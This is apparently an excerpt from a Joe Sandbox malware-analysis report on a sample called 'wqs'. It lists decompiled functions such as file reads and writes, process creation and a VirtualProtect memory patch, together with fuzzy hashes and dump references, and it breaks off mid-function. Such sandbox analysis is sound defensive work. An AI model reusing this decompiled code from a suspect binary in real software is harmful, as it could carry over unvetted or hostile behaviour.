Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e3
0x004060f3
0x004060fb
0x00000000
0x00406102
0x00000000
0x00406104

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b4
0x004060c4
0x004060cc
0x00000000
0x004060d3
0x00000000
0x004060d5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 6C772A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6c775048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6c77505c, 4, 0x40, 0x6c77504c); // executed
					 *0x6c77505c = 0xc2;
					 *0x6c77504c = 0;
					 *0x6c775054 = 0;
					 *0x6c775068 = 0;
					 *0x6c775058 = 0;
					 *0x6c775050 = 0;
					 *0x6c775060 = 0;
					 *0x6c77505e = 0;
				}
				return 1;
			}

0x6c772a88
0x6c772a8d
0x6c772a9d
0x6c772aa5
0x6c772aac
0x6c772ab1
0x6c772ab6
0x6c772abb
0x6c772ac0
0x6c772ac5
0x6c772aca
0x6c772aca
0x6c772ad2

APIs

VirtualProtect.KERNELBASE(6C77505C,00000004,00000040,6C77504C), ref: 6C772A9D

Memory Dump Source

Source File: 0000000B.00000002.1053928875.000000006C771000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C770000, based on PE: true

Associated: 0000000B.00000002.1053905102.000000006C770000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1053982527.000000006C774000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1054013557.000000006C776000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c770000_wqs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6cb0be8cddedc987facedd58a224ec4c70c6096adfb4039efeb2eccccb16d873
Instruction ID: a0ea307c0217f77a4f86e6d5b6b27ee124e51487d32f712f8735df0883738662
Opcode Fuzzy Hash: 6cb0be8cddedc987facedd58a224ec4c70c6096adfb4039efeb2eccccb16d873
Instruction Fuzzy Hash: E4F0AEB0B043A8DEDBE2CF38A54CB093BF0B70B308B154A7AE18AD6640E3344044DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
Opcode Fuzzy Hash: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19

Uniqueness

Uniqueness Score: -1.00%

Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8; // 0x30424
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044e5
0x004044ec
0x004044f7
0x00000000
0x004044f7
0x004044fd

APIs

SendMessageW.USER32(00030424,00000000,00000000,00000000), ref: 004044F7

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C

Uniqueness

Uniqueness Score: -1.00%

Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044dc
0x004044e2

APIs

SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034f3
0x004034f9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}

0x004044c5
0x004044cb

APIs

KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7); // executed
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

APIs

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 6570193f3971fa89e1b9c94cb1676c49c8e50bfb3adc699ca7c03e5dddf77f4d
Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
Opcode Fuzzy Hash: 6570193f3971fa89e1b9c94cb1676c49c8e50bfb3adc699ca7c03e5dddf77f4d
Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d84069f9066c4545032549787e4689b43e1c424b07629487b497987245d4e38c
Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
Opcode Fuzzy Hash: d84069f9066c4545032549787e4689b43e1c424b07629487b497987245d4e38c
Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
